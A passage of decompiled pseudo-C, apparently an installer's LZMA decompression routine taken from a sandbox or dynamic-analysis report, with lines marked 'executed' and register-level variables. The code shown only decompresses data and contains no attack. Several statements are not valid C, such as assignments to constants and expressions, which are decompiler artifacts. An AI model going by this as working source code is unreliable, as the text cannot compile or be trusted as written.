												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
